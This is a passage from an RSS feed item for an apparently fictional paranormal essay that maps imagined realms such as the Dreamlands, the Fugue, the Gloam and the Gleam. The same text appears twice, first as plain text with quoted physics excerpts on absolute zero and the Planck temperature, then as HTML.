sounds. Your brain tries very hard to convince you that your dreams are reality while you are in them because your brain has an agenda. Your brain wants you to learn something or see something and if you realize you are dreaming, you can derail that plan.&#xA;&#xA;If you know you are dreaming, if you are Dreaming, you can push back, gently at first. Learn the rules. Make a few additions.&#xA;&#xA;The next trick is to remember your previous Dreams when you are Dreaming. Remember what you learned last time. Don&#39;t be flashy; don&#39;t draw attention to it. Just remember. Remember how you could stand on your tip toes and then lift your toes and float in place? See if you can still do that. Remember how you could push your hand through a window like the glass was made of putty? Try that again. Could you breathe underwater? There&#39;s a swimming pool, see if you still can. Just for a moment. Just for a second. Not enough to take away from the narrative.&#xA;&#xA;When you remember enough tricks, you can finally find the Dreamlands, the real Dreaming for real Dreamers.  &#xA;It&#39;s like Plato&#39;s Cave. You&#39;ve been Dreaming at the shadows on the wall. Now you get to turn around.&#xA;&#xA;Your brain may try to hold you in place, force you to turn back to the cave wall. It will try to convince you that it still has so much to teach you, that you are safer in the cave. You are, of course, but where&#39;s the fun in that?  &#xA;The Dreamlands is populated by creatures of fantasy and horror, with cities ancient and futuristic, all borne of the Dreaming minds of humanity over the centuries. The Dreamlands are an everchanging place, but they only change at the whim of Dreamers. Dreamers can be as gods here. And if you search far and wide, you will find other gods, even gods whose names you&#39;ve heard from mythology. In the Dreamlands you can build empires and destroy them, visit the center of the earth or the surface of Mars, talk to shadows, shrink down to an inch and befriend insects, expand to colossal size and have a heart-to-heart with a kaiju. Create whatever you can imagine. The human-like denizens of the Dreamlands revere Dreamers above all else.&#xA;&#xA;The biggest risk of the Dreamlands is that you are no longer alone. Other Dreamers visit the Dreamlands and have their own ideas. The Dreamlands are big enough for everyone but there are some who seek out others to antagonize. Perhaps they get bored. Perhaps they are worried that too many people may find the Dreamlands and they will no longer have their little corner.&#xA;&#xA;It is said that when a Dreamer who frequently traverses the Dreamlands dies, their mind finds itself back there, forever. I have no evidence or experience to back this up one way or another as the Dreamlands are far too large to fully explore.&#xA;&#xA;The Fugue&#xA;The Fugue is a strange half-existing place, between slumber, dreaming, and wakefulness. It&#39;s often called &#34;sleep paralysis&#34; or &#34;night terrors&#34; but it is more than that. When the body is caught just so between dreaming and being fully awake, you can perceive a place that vibrates at a slightly different frequency. It&#39;s such a narrow band that it&#39;s easy to miss, but it is full of intelligent life. By appearances, they are creatures of nightmare or denizens of hell, but that is just how they look.&#xA;&#xA;In fact, the residents of the Fugue crave human companionship and it is their overeagerness that led to legends of demons sitting on chests or stealing the life from babies. The Fugue is a cold place and the warmth of mankind is dearly sought after and fought over. But it is only in those moments between when we may see each other properly. And it is not easy to stay when you are on the way in or out.&#xA;&#xA;I suppose we all must pass through the Fugue on the way to the Dreaming and back, but we pass so quickly that we scarcely notice.&#xA;&#xA;For those who understand the Fugue, you can make easy friends with the things living there. Faceless, eyeless, skinless terrors by appearance but kind and friendly if you give them a chance. Some love to chat about our world and get their sustenance by the exchange of ideas. Others find physical contact more directly expedient and will eagerly mount and copulate with anyone who assumes the position, whether on purpose or not. This has led to their negative reputation, but, honestly, it&#39;s just how they eat and they have to eat.&#xA;&#xA;Those natives that become truly forgotten sink down into shadow, into the Gloam, to be repurposed.&#xA;&#xA;Those that receive enough love may be elevated to Epicurea and become harbingers of daydreams or sudden insights.&#xA;&#xA;The Fugue is also one way to reach Nuntius, the Realm of Knowledge where the Akashic Records and the Library of Babel can be found. You must pass through Nightmare, Regret, and Longing to reach it from this path and most never find their way through.&#xA;Effervescence&#xA;Between us and The Gleam.&#xA;&#xA;Realm of meaningless delight.&#xA;&#xA;Insight and questing to the right.&#xA;&#xA;Resignation and acceptance to the left. &#xA;&#xA;Perhaps this is the home of the Fae. The Seelie.&#xA;&#xA;Effluvia&#xA;Between us and The Gloam.&#xA;&#xA;Realm of decay.&#xA;&#xA;The Unseelie.&#xA;&#xA;The Gloam&#xA;Umbra&#xA;&#xA;The Void&#xA;&#xA;The Gutter&#xA;&#xA;The Gloaming&#xA;&#xA;To reach the Gloam without drugs or heavy meditation is not impossible, but is very unlikely. The Gloam is no-man&#39;s land between us and oblivion. The Gloam is a gutter, a shadow of this world. Most people seek to avoid it, pass around it, or through it so quickly that it doesn&#39;t matter. Mirror walkers can avoid it, shadow walkers make frequent use of it. Vermin from this world and the Dreaming frequently cross over into the Gloam because it is easy to find food there. It is a place where, unlike the Fugue, our warmth is despised and hated. As such, tiny creatures wandering in to eat and dispose of those bits of us that remain is seen as a benefit, doubly so because their presence unnerves us. Spiders, rats, roaches, snakes, flies, maggots, all of them have negative connotations to most humans. To see them in the dark places just adds to our fear and the things that live in the Gloam feed on fear and despair.&#xA;&#xA;They are called Shadow Things, Shadow People, Shadow Men, a thousand other names. They are sought out by some because they know everything. They know everything because shadows are everywhere and they are always listening.&#xA;&#xA;They know everything and they do not lie. They could lie if they wanted to, but telling the truth generally hurts us more than lying to us, so they tell the truth. And that is the crux of their existence: oracles of truth of the most unfortunate kind, things you&#39;d rather not know. Things you can never forget once told.  &#xA;You don&#39;t have to visit the Gloam to find the Shadows. You can reach out to them in many ways. But offering blood, yours or someone else&#39;s is the easiest way. They love it when we spill blood. They love it when we are afraid.&#xA;&#xA;And, remember, they are always listening.&#xA;&#xA;Always.&#xA;&#xA;--&#xA;&#xA;The Gloam is also the home of Naralmtu, the God of Shadows. It is not something to be invoked on a whim and most who know of it never speak its name or write down a word about it. To know it is to be known by it and when the shadows take special interest in you, your life will be filled with cold despair, disappointment, hardship, and loss. There are those that worship it, however. The feed it the lifeblood of sacrificial humans and animals. They feed it their own blood. In exchange for knowledge, in exchange for turning the shadows against their enemies. Some followers know they are being used and drained just as surely as their victims, but they do not care. Temporary power over their finite lifetimes is reward enough for these empty souls.&#xA;&#xA;I know a great deal more about this entity, but to write it down is to further imperil myself.&#xA;&#xA;The Gleam&#xA;The Blazing World&#xA;&#xA;Hyperspace&#xA;&#xA;The Gleaming&#xA;&#xA;If you have heard of the &#34;machine elves&#34; then you have heard of the Gleam. Without drugs or a strong will and careful magick, this realm is impossible to comprehend. It is as far as our human minds can reach, to go further is to find nothing that can be described or understood. Do not take that as a challenge. Our bodies, our flesh is simply not capable of experiencing that many special dimensions. To put it another way, there are some directions in which we are unable to see. What would &#34;up&#34; mean to a stick figure living on a piece of paper? It is the same for us. The Gleam is the edge of this space. To our minds, it seems to extend forever in all directions, in colors without names, endlessly folding and unfolding itself, rejuvenating and decaying, being born and dying over and over. That is how our brains interpret the edge of 4 dimensional space-time when we try to peer beyond.&#xA;&#xA;From there, if you can properly direct yourself, you can see the past or the future, you can see what might have been or what could never be. You can relive your favorite moment for eternity in just a few moments.  &#xA;The machine elves hang out on this barrier to greet travelers. It is in their nature to be jovial and helpful, but also chimeric and mischievous. They appear to us to be made of crystalline lattices shaped into insect-like bodies. Just like their entire realm, they are constantly folding and unfolding, becoming and unbecoming. They can, if they wish, project forms more suited to our senses and sometimes they may. Also, while their native language is one of thought pictures, impressions, and feeling, they can translate their ideas into our speech, though something is lost in the translation and it often sounds like they are talking over themselves, trying to mix various meanings together. Imagine the same conversation in each of your ears but with slightly different wording and at a slightly different pace. Now imagine that times a hundred.&#xA;&#xA;The Gleam is a place of possibilities. That is why most of us seek it. You can see what we can be if we make the best choices and it may inspire you to be a better person. That&#39;s what the machine elves want. They want us to be the best versions of ourselves.&#xA;&#xA;A single trip to the Gleam can turn anxiety into ecstasy and depression into hope.&#xA;&#xA;--&#xA; &#xA;A secret about the machine elves that most do not know. They are not the highest lifeforms in their plan of existence. In fact, they are barely more than what we would call bacteria or simple multicellular life. But such is the differences in our levels of reality that even the lowest among them is godlike by comparison. It&#39;s also why they are interested in us. We are a sapient species reaching out and we treat them with a level of awe and respect that they cannot find in their own world alone.&#xA;&#xA;They line the &#34;shore&#34; of the &#34;ocean&#34; we swim up through, looking for lights to rescue. When we peak through, they surround us and so we are enlightened.&#xA;&#xA;To meet a higher lifeform from their plane would likely be disastrous to a human mind, like gazing into infinity or a naked singularity.&#xA;&#xA;The Gloam is about inevitably.&#xA;&#xA;The Gleam is about possibility.&#xA;&#xA;Ur&#xA;When the nothing became something, yet still before the first vibration, before the first waveform, before the first Planck length had been crossed, there was Ur, The First Place, the Ocean of Creation.&#xA;&#xA;It is just as much a furnace, boiling and churning raw possibilities, recombining them into new things while simultaneously devouring and recycling the old with no care as to which. It has no guiding consciousness, no blueprints or plans, no thoughts of its own to speak of.&#xA;&#xA;It is chance.&#xA;&#xA;It is random.&#xA;&#xA;But it is also eternal.&#xA;&#xA;Given time, moments of apparent order can arise out of chaos. If they are quick and lucky, some few of these moments break free, find the surface, crawl away, and seep into other realms. It is from those stolen remnants that everything we know to exist arose.&#xA;&#xA;The borders of Ur are filled with rotting carcasses of failed escapees and the trails, some wide and ragged, some so small as to be invisible, from those that made it. Be wary of stragglers or new arrivals who, eager for energy or ignorant of their strength, may seek you out and do you harm.&#xA;&#xA;Under no circumstances should any living thing deign to enter Ur itself. It&#39;s driving nuclear engine would rip apart anyone or anything foolish enough to slip under its surface faster than the speed of light.&#xA;&#xA;It is said that certain creatures, those acquainted with chaos, know ways to traverse the waters safely, but they are known to traffic in lies and half-truths. To put your faith in anything they offer in regards to Ur is more suicidal than simply foolish.&#xA;&#xA;Why would anyone seek out such a place?&#xA;&#xA;Change is seductive, to be someone else, to be better.&#xA;&#xA;Perhaps you are terminally ill.&#xA;&#xA;Perhaps you are hopeless.&#xA;&#xA;Perhaps you are stuck, broken, lonely, inadequate, afraid, incomplete.&#xA;&#xA;Would you be willing to throw your life into a blender and pray you retain your &#34;self&#34; in the recombination?&#xA;&#xA;Would you be so unsatisfied with your current life that you are willing to risk complete dissolution?&#xA;&#xA;Or perhaps.&#xA;&#xA;Perhaps.&#xA;&#xA;You prefer to be undone.&#xA;&#xA;There are those who have been so traumatized by the act of living in the world as it is that they wish to escape into emptiness and leave nothing behind. They do not care for legacies. They do not see &#34;the future&#34; as anything but a continual slide into pain, isolation, and loneliness. They see the truth: entropy is inevitable.&#xA;&#xA;But instead of seeking strength or fellowship, they choose to forget and to be forgotten.&#xA;&#xA;What they do not understand is that Ur is rebirth. They will cease, but every bit of everything that made them who they were will be repurposed and reused to make another or billions of others stretched and threaded until unrecognizable.&#xA;&#xA;True endings are only available from embracing Oblivion, from the orthogonal path back to the beginning, back to the ending. Only there can everything be truly nothing, forever and ever.&#xA;&#xA;--&#xA; &#xA;Nessianna Inmenna operates out of Ur. To her, the radioactive waters are like a warm bath, a comfort.&#xA;&#xA;Elysium / Nirvana&#xA;Imagine a party that never ends spanning worlds filled with abundant life. That is Elysium, also called Nirvana.  &#xA;A &#34;party&#34; is something with a different definition for each culture. For some it is a celebration of excess. For others, it may be an acknowledgement that you finally understand that you have no desires at all. For both, it is a place without responsibilities.&#xA;&#xA;Elysium is a paradise of wanting and needing nothing, whether this is because everything is provided that you could possibly want or a place of emptiness because all worldly concerns have vanished, you will find it here and you will be at peace.&#xA;&#xA;Epicurea&#xA;Epicurea is another world of plenty, but it does not give those who visit anything for free. You must work to find what you desire, but it is here. It is always here and you may find it if you pass the tests, survive the gauntlets, answer the riddles. It is a plane of growth and perseverance. &#xA;&#xA;Unlike Elysium, here, you can fail. You may not solve the puzzles on the first try. You may not find your way through the maze. But you can try again.&#xA;&#xA;Hell&#xA;Hell is not a place intended for punishment, not directly. Hell is a place for refinement and growth. Some who find themselves here may never realize that and they may be &#34;tortured&#34; for eternity. Others may thrive, find themselves, rarified, and leave freely as something greater than what arrived.&#xA;&#xA;Hell is not a single place or a single experience. It is something that builds itself around the expectations of its inhabitants. Many may share the same Hell or Hells, but that is a quirk of organized religion planting the same set of expectations in the minds of billions.&#xA;&#xA;Nuntius&#xA;Nuntius is a realm of secrets, of knowledge, of every book that could ever be written. It is also a plane full of lies and deception so the traveler must be cautious and careful.&#xA;&#xA;One can find the Akashic Record here, but there is no helpful librarian, no card catalog or directory, and any one book is just as likely to be a fake as to be genuine. Additionally, a single wrong step and you may find yourself in the The Library of Babel instead and that path is guaranteed madness.&#xA;&#xA;Vitrium&#xA;Imagine a world where every tree, every insect, every blade of grass, every gust of air is broadcasting every detail of itself to every other thing, all the time. It is a world of perfect, unfiltered information; a place where there are no secrets.&#xA;&#xA;To visit Vitrium is to be laid bare to yourself and everyone else. There are no shadow selves here, no lies or deception, only Truth.&#xA;&#xA;For a human mind, the raw experience of such a place is a meaningless cacophony, too wide, too deep, too bright, too loud. It is impossible to process. &#xA;&#xA;Acceptance / Obsequium&#xA;Obedience, Submission, Compliance, Resignation&#xA;&#xA;Concerned with how&#xA;&#xA;Science, Religion, Rules, anything with codified and definitive answers, anything that replaces warm hope with cold truth.&#xA;&#xA;Passive while appearing Active.&#xA;&#xA;Insight / Consilium&#xA;Insight, Discernment, Understanding&#xA;&#xA;Concerned with why&#xA;&#xA;Introspection, Mindfulness, experience over explanation, seeing and being over knowing.&#xA;&#xA;Active while appearing Passive.&#xA;&#xA;Addendum 1: Oblivion&#xA;The Blight&#xA;&#xA;Singularity&#xA;&#xA;Nowhere&#xA;&#xA;Nowhen&#xA;&#xA;Absolute Zero&#xA;&#xA;Before existence, there was Oblivion. Eternal because time had not yet ticked its first. Limitless because space had not yet been borne. It was nothing and everything. Potential without ignition, less than the sum of its parts. It is absolute entropy and the state to which every universe seeks to return.&#xA;&#xA;Naralmtu serve The Blight.&#xA;&#xA;Absolute Zero&#xA;https://en.wikipedia.org/wiki/Absolutezero&#xA;Absolute zero is the lowest possible temperature, a state at which a system&#39;s internal energy, and in ideal cases entropy, reach their minimum values. The Kelvin scale is defined so that absolute zero is 0 K, equivalent to −273.15 °C on the Celsius scale,[1][2] and −459.67 °F on the Fahrenheit scale.[3] The Kelvin and Rankine temperature scales set their zero points at absolute zero by design. This limit can be estimated by extrapolating the ideal gas law to the temperature at which the volume or pressure of a classical gas becomes zero.&#xA;&#xA;At absolute zero, there is no thermal motion. However, due to quantum effects, the particles still exhibit minimal motion mandated by the Heisenberg uncertainty principle and, for a system of fermions, the Pauli exclusion principle. Even if absolute zero could be achieved, this residual quantum motion would persist.&#xA;&#xA;Although absolute zero can be approached, it cannot be reached. Some isentropic processes, such as adiabatic expansion, can lower the system&#39;s temperature without relying on a colder medium. Nevertheless, the third law of thermodynamics implies that no physical process can reach absolute zero in a finite number of steps. As a system nears this limit, further reductions in temperature become increasingly difficult, regardless of the cooling method used. In the 21st century, scientists have achieved temperatures below 100 picokelvin (pK). At low temperatures, matter displays exotic quantum phenomena such as superconductivity, superfluidity, and Bose–Einstein condensation.&#xA;&#xA;Addendum 2: Rapture&#xA;The Bloom&#xA;&#xA;The Song&#xA;&#xA;Ecstasy&#xA;&#xA;Exultation&#xA;&#xA;Ubiquity&#xA;&#xA;Omnilarity&#xA;&#xA;Everywhere&#xA;&#xA;Everywhen&#xA;&#xA;Quantum Foam&#xA;&#xA;Everything that can exist, does exist here. Everything that cannot exist, exists here. Everything that was and was not, what will be and will not be, exists here. This is all things, all times, all places, all thoughts, all possibilities and impossibilities.&#xA;&#xA;This is the first moment, before any rules have been established, before up is up and down is down.&#xA;&#xA;Ohmadrundi (a subset of machine elves) serve The Bloom.&#xA;&#xA;IMAGE MISSING &#xA;&#xA;Absolute Hot (Planck Temperature)&#xA;[[What Is The Hottest Temperature in The Known Universe, And Could We Achieve It]]&#xA;https://www.straightdope.com/21341968/what-is-the-opposite-of-absolute-zero&#xA;There is a limit, sort of, but it’s so inconceivably large that nobody but high energy physicists talks about it (although as I think about it absolute zero doesn’t exactly qualify as breakfast table chatter either). The highest possible temperature, called the Planck temperature, is equal to 10sup32/sup degrees Kelvin. For comparison, the center of the sun bubbles along at 15 million K (15 x 10sup6/sup); silicon can be created by fusion at 1 billion K (10sup9/sup). In short, the Planck temperature is very toasty indeed.&#xA;&#xA;Some scientists believe that we, or at least our universe, have already experienced the Planck temperature, although it went by so quickly you may have missed it. It occurred at 10 sup-43/sup of a second after the Big Bang, the great cataclysm in which the universe was born. (10 sup-43/sup  of a second, in case you’re not hip to the notation, is an incredibly tiny fraction of time. Time enough to create the universe, but not, as a University of Chicago physicist was once at pains to explain, time enough to get off a disputed last-tenth-of-a-second shot against the Chicago Bulls.)&#xA;&#xA;Absolute zero is easier to understand than the Planck temperature. What we perceive as heat is a function of motion. The colder something gets, the less internal motion or vibration its molecules exhibit. At absolute zero — that is, zero Kelvin or -460° Fahrenheit — molecular motion virtually stops. At that point whatever the molecules are a part of is as cold as it’s going to get.&#xA;&#xA;There’s a lot more latitude in the opposite direction. The faster molecules move, the hotter they get. At 10sup10/sup K electrons approach the speed of light, but they also become more massive, so their temperature can continue to rise. At 10sup32/sup K such staggering densities obtain that greater temperature would cause each particle of matter to become its own black hole, and the usual understanding of space and time would collapse. Ergo, the Planck temperature is as hot as things can get. Or at least it’s the highest temp conceivable in present theory. There’s a chance when a quantum theory of gravity is worked out we may find even higher temperatures are possible. The prospect, frankly, leaves me cold.&#xA;&#xA;Addendum 3: The Mirror Realm&#xA;Also called “Ouroboros”&#xA;&#xA;Chirality is not a word you are likely to hear in every day conversation, but it is at the heart of the final place we must consider: The Mirror Realm.&#xA;&#xA;To understand the idea simply, look at your hands. Despite the fact that they seem functionally identical at first glance, there is no direction or method by which your left hand could be held or manipulated into being your right hand.&#xA;&#xA;This feature of our reality is called “chirality” - there are structures that cannot be reshaped into their mirror images without destroying them or fundamentally changing their function.&#xA;&#xA;This “handedness” goes deeper than our hands and into our DNA, the food we eat, the forces and fields that bind our base elements together and allow us to exist as complex, thinking biological systems and further extends into the other places written above.&#xA;&#xA;There is a preferred direction in which we all twist that cannot be undone. Our multiverse is incompatible with the idea. To whit, “mirror” proteins cannot nourish us and “mirror” energies would be vastly different in how they functioned and may not function at all.&#xA;&#xA;And yet, we see into a world that flips the direction effortlessly every time we see our own reflection in a mirror.&#xA;&#xA;Mirrors offer us a window into another reality which resembles ours but where the rules are very different. As I said, we can easily project an image of ourselves into this version of reality, but could we truly step into it?&#xA;&#xA;Before answering that, let us discuss the art of scrying, divining by looking into something akin to a black mirror or, rather, looking beneath the surface of the black mirror. Why would scrying produce tangible results? Why would peering into a reflection of our own world provide any insight into our own?&#xA;&#xA;I have already mentioned that the laws are different in that place, but you must also consider how freely we reflect. Every drop of water and snowflake, every pane of glass, every polished boot, every silver earring, every chrome pipe, every phone screen and television, every set of mirrors attached to automobiles, produce reflections. Our entire world is reflected into this mirror realm. It is impossible to not reflect ourselves multiple time a day.&#xA;&#xA;To scry is to peer sideways into the mirror realm and find insight. It is too look beyond your own reflection, to ignore it and see what lies behind it and beneath it. The scryer finds our own reality broken into pieces, fragmented, seen from a thousand different angles, atomized and rarefied down to essentials. The wise mind understands how to combine these snippets into a clearer picture of the whole than if they had seen it firsthand. This direction, seeing the back of reality, the mirror, gives them insight which can be translated back into truths valid in our own reality.&#xA;&#xA;If such power can be had by simply looking how much greater would it be to walk within?&#xA;&#xA;As I have said, chirality means the essence of our reality is not compatible with the mirror realm. There is life there, of a kind, but not life we would recognize. Monstrous life that only moves when we aren’t looking because our perception of it from our side of the glass renders it invisible and freezes it in time. Stare at a mirror in the dark long enough and you will start to see evidence of them in the way your own reflection morphs into something unrecognizable. But they cannot hurt us and we cannot harm them. We are simply incompatible.&#xA;&#xA;However, if someone were step through the mirror, into the mirror realm itself, then we become briefly tethered to their reality. For a short time, we can breathe the air, we can walk along the surfaces, we can hear and see. All the while, our flesh is fighting an invisible battle against molecules that are not designed for us. A buzzing in the ears, a bloody nose, blurry vision, hallucinations, nausea.&#xA;&#xA;And the things that live there are slowly but surely no longer bound by our perception. They turn their multifaceted eye stalks and twitch with unexpected motion, able to watch and plan.&#xA;&#xA;How do you think an intelligent creature would feel about finally being able to confront one of those hateful things whose very gaze once paralyzed them?&#xA;&#xA;Mirror Walkers claim that time does not pass for them on the other side of the glass. They will tell you that they cross incalculable distances in fractions of a second and that there is no living thing on the other side that can catch them because of the speed with which they traverse the place.&#xA;&#xA;It is up to you whether or not you wish to believe them.&#xA;&#xA;Addendum 4: The In Between&#xA;The In Between is a strange corollary to The Mirror Realm, a place visited by few and often whispered of as if little more than a fairy tale.&#xA;&#xA;In stories, it is a stale, stagnant place outside of time yet between spaces. One could stay here forever and never age a day. The only cost being ambition and drive.&#xA;&#xA;At the edges, a visitor can see out but cannot be seen, making it an ideal method of clandestine information gathering.&#xA;&#xA;Why would this place be considered a sibling to The Mirror Realm?&#xA;&#xA;The most common way to enter The In Between is to step inside a wall.&#xA;&#xA;Addendum 5: The Fae&#xA;They exist. They flit between layers of reality as easily as turning a page in a book. But where are they from? Where do they live?&#xA;&#xA;I can only speculate. Even the shadows merely cough and gasp in what passes for their laughter when I ask, refusing to give an answer. &#xA;&#xA;Perhaps the answer lies in other liminal, transitional places such as The Fugue or The In Between. Perhaps the answer is in yet another nameless direction in which I will have to learn to peer. That would at least explain why they are so unpredictable: they operate under a different set of rules, entirely.&#xA;&#xA;---&#xA;&#xA;Psychomancer&#xA;#Writer #Writing #Writers #WritingCommunity #WritersOfMastodon #ShortFiction #ParanormalFiction]]&gt;</description>
      <content:encoded><![CDATA[<hr>

<p>created: 2024-06-23T14:57:42
updated: 2025-07-31T23:43:24
modified: 2026-02-09T07:10:38-06:00</p>

<hr>

<p>Editor&#39;s note: the fool thinks himself cartographer charting five dimensional space-time as if a plane could hold its complexity. Nor does he address its propensity for change where blurry borders shift as swiftly as the dunes and just as unpredictably. Still, it may help the layperson understand their place, insubstantial though it may be. – ANV.</p>

<p>Two toruses surrounding a sphere with all of them bleeding into one another, gradually <em>becoming</em> each other.</p>

<p>🜁🜂🜃🜄</p>

<hr>

<p>Our universe, all of reality as we can objectively experience it and study it, is but one level of a greater existence. We occupy a world of three spatial dimensions and one of time. The two are interlinked and influence each other such that we call the whole thing space-time. The only real difference between time and space is that time moves only in a single direction for us. We can slow it down, even stop it, but we cannot reverse it or travel backwards upon its trajectory. This leads to entropy, the fact that everything we know will one day end.</p>

<p>But there are other places that our minds can reach into given the right circumstances. Some of these are what we might call parallel, some are “above” or “below”, but all are in directions that have no names and that cannot be described easily by science. They are mystical places, magickal realms that require altered states to experience.</p>

<p>Intelligence, sapience, self-awareness are the keys to this type of “travel”. Humans have evolved the capacity for it. Perhaps thanks to genetic coding from our forebearers. Perhaps, given time, all intelligence will develop these abilities.</p>

<p><strong><em>IMAGES MISSING</em></strong></p>

<h1 id="the-other-way-the-æther-the-astral-plane">The Other Way / The Æther / The Astral Plane</h1>

<p>Directly on top of what we can see with our eyes is another place with many names. To see in that space is called looking <strong>the Other Way</strong> by some or seeing auras. When science wasn&#39;t as strong as it is today, everyone believed it was there, just invisible. Today, it is left to the realm of magick and psychics, unfortunately.</p>

<p>Most sapient life can peer into this place with practice. Looking the Other Way is also called opening the third eye but, in truth, it is looking at the world from an impossible angle, orthogonally. Our biology is not designed to understand this strange direction so we have developed a series of sensory metaphors accepted into the universal unconsciousness that allows us to interpret it without going mad.</p>

<p>We see auras and visions, we hear music or discord, we smell flowers or filth, we feel tingling or coldness on our skin, we taste sweetness or other things. It is the way we see a deeper truth about the world around us.<br>
The dead leave their imprint on this place and you may find ghosts or spirits. Do not be fooled by them. They are not the people they represent. They are echoes, imprints, memories of them, but they are not truly living things. Given time, they may believe themselves to be who they seem, but it is a self-deception.</p>

<p>Among the ghosts are things that feed on such energy and things that can feed on our lifeforce directly. To feed, they need to be perceived. But only once. If you see them, smell them, taste them, they can touch you in return and, in touching, attach themselves. From that moment forward, you have a parasite that will suckle itself on your dreams, your hopes, your fears, your tears, any strong emotions, though some seem to have preferences. To remove them, you have to see them once again which, of course, opens you up to more attacks.</p>

<p>There are even fully sapient beings that appear to be native to this place, taking innumerable shapes and having their own drives and desires. They may choose to reach out to us as friends or as predators, but mostly they ignore us as not worth the effort.</p>

<p>There are some humans who can leave their bodies behind, but tethered, and send their essence far out into the Other Way, discovering those temples and cities, graveyards and ruins of all civilizations that came before and where the old gods once resided. The silver cord connecting the wandering soul to the body is thin, nearly invisible, but it is strong as spider silk spun from steel. Strong, but not impervious to damage. If the cord is broken, the traveler must find their own way home. If they have gone far enough, this may be impossible, leaving their body without a force to drive it, sleeping dreamlessly, autonomously breathing, digesting, living, but not truly alive. When the body eventually dies, the spirit will feel its loss and it, too, will fade.</p>

<p>The other possibility is you may return to find that your body is no longer yours at all. While absent your body, some opportunistic being may slither inside the hole you left behind. You will become “indwelt” by something that noticed your absence. They will have your body and your mind, more than enough to <strong>be</strong> you and take over your life. The only thing missing is your soul which, with the loss of the body, will likely fade or be devoured. “You” will cease to be while the thing wearing your skin and remembering your memories is free to experience the physical world for the rest of your lifetime.</p>

<p>Looking the Other Way is difficult and dangerous. For most, it is just a “feeling” or a “knowing” that comes at certain times, nothing as dramatic as auras or ghosts. And, if you have these extra senses? Embrace them, enjoy them, use them, but do not choose to venture further afield unless you are willing to accept the risks.</p>

<h1 id="the-dreaming">The Dreaming</h1>

<p>The <strong>Dreaming</strong> is easy to reach. Just go to sleep for 90 minutes or so and your brain reaches out to it automatically. It&#39;s the little melting pot of the collective unconscious, where we go to sort through our memories and feelings and give our brains little bit of a workout for the night. It&#39;s exercise for your subconscious. It&#39;s healthy and natural to be here and everybody does it.</p>

<p>The Dreaming is not designed to be a place that builds memories. Your brain goes out of its way to make the conscious mind forget what it experiences. It is only through luck or practice that we may begin to remember our dreams in detail. And that is the first step to going deeper.</p>

<h1 id="the-dreamlands">The Dreamlands</h1>

<p>The <strong>Dreamlands</strong> are a little bit deeper. You have to reach the Dreaming first, before you can reach the Dreamlands. You have to find the way. Sometimes, you fall into the Dreamlands by mistake and experience the most amazing, life-changing dreams you&#39;ve ever felt. Realer than real. Colors with no names, indescribable music, flying and swimming, life affirming, impossible to forget.</p>

<p>But, typically, you have to find your way to the Dreamlands. You have to understand first that you are dreaming, which is more difficult than it sounds. Your brain tries very hard to convince you that your dreams are reality while you are in them because your brain has an agenda. Your brain wants you to learn something or see something and if you realize you are dreaming, you can derail that plan.</p>

<p>If you know you are dreaming, if you are <em>Dreaming</em>, you can push back, gently at first. Learn the rules. Make a few additions.</p>

<p>The next trick is to remember your previous Dreams when you are Dreaming. Remember what you learned last time. Don&#39;t be flashy; don&#39;t draw attention to it. Just remember. Remember how you could stand on your tip toes and then lift your toes and float in place? See if you can still do that. Remember how you could push your hand through a window like the glass was made of putty? Try that again. Could you breathe underwater? There&#39;s a swimming pool, see if you still can. Just for a moment. Just for a second. Not enough to take away from the narrative.</p>

<p>When you remember enough tricks, you can finally find the Dreamlands, the <strong>real</strong> Dreaming for <strong>real</strong> Dreamers.<br>
It&#39;s like Plato&#39;s Cave. You&#39;ve been Dreaming at the shadows on the wall. Now you get to turn around.</p>

<p>Your brain may try to hold you in place, force you to turn back to the cave wall. It will try to convince you that it still has so much to teach you, that you are safer in the cave. You are, of course, but where&#39;s the fun in that?<br>
The Dreamlands is populated by creatures of fantasy and horror, with cities ancient and futuristic, all borne of the Dreaming minds of humanity over the centuries. The Dreamlands are an everchanging place, but they only change at the whim of Dreamers. Dreamers can be as gods here. And if you search far and wide, you will find other gods, even gods whose names you&#39;ve heard from mythology. In the Dreamlands you can build empires and destroy them, visit the center of the earth or the surface of Mars, talk to shadows, shrink down to an inch and befriend insects, expand to colossal size and have a heart-to-heart with a kaiju. Create whatever you can imagine. The human-like denizens of the Dreamlands revere Dreamers above all else.</p>

<p>The biggest risk of the Dreamlands is that you are no longer alone. Other Dreamers visit the Dreamlands and have their own ideas. The Dreamlands are big enough for everyone but there are some who seek out others to antagonize. Perhaps they get bored. Perhaps they are worried that too many people may find the Dreamlands and they will no longer have their little corner.</p>

<p>It is said that when a Dreamer who frequently traverses the Dreamlands dies, their mind finds itself back there, forever. I have no evidence or experience to back this up one way or another as the Dreamlands are far too large to fully explore.</p>

<h1 id="the-fugue">The Fugue</h1>

<p>The <strong>Fugue</strong> is a strange half-existing place, between slumber, dreaming, and wakefulness. It&#39;s often called “sleep paralysis” or “night terrors” but it is more than that. When the body is caught <em>just so</em> between dreaming and being fully awake, you can perceive a place that vibrates at a slightly different frequency. It&#39;s such a narrow band that it&#39;s easy to miss, but it is full of intelligent life. By appearances, they are creatures of nightmare or denizens of hell, but that is just how they look.</p>

<p>In fact, the residents of the Fugue crave human companionship and it is their overeagerness that led to legends of demons sitting on chests or stealing the life from babies. The Fugue is a cold place and the warmth of mankind is dearly sought after and fought over. But it is only in those moments between when we may see each other properly. And it is not easy to stay when you are on the way in or out.</p>

<p>I suppose we all must pass through the Fugue on the way to the Dreaming and back, but we pass so quickly that we scarcely notice.</p>

<p>For those who understand the Fugue, you can make easy friends with the things living there. Faceless, eyeless, skinless terrors by appearance but kind and friendly if you give them a chance. Some love to chat about our world and get their sustenance by the exchange of ideas. Others find physical contact more directly expedient and will eagerly mount and copulate with anyone who assumes the position, whether on purpose or not. This has led to their negative reputation, but, honestly, it&#39;s just how they eat and they have to eat.</p>

<p>Those natives that become truly forgotten sink down into shadow, into the Gloam, to be repurposed.</p>

<p>Those that receive enough love may be elevated to Epicurea and become harbingers of daydreams or sudden insights.</p>

<p>The Fugue is also one way to reach Nuntius, the Realm of Knowledge where the Akashic Records and the Library of Babel can be found. You must pass through Nightmare, Regret, and Longing to reach it from this path and most never find their way through.</p>

<h1 id="effervescence">Effervescence</h1>

<p>Between us and The Gleam.</p>

<p>Realm of meaningless delight.</p>

<p>Insight and questing to the right.</p>

<p>Resignation and acceptance to the left.</p>

<p>Perhaps this is the home of the Fae. The Seelie.</p>

<h1 id="effluvia">Effluvia</h1>

<p>Between us and The Gloam.</p>

<p>Realm of decay.</p>

<p>The Unseelie.</p>

<h1 id="the-gloam">The Gloam</h1>

<p>Umbra</p>

<p>The Void</p>

<p>The Gutter</p>

<p>The Gloaming</p>

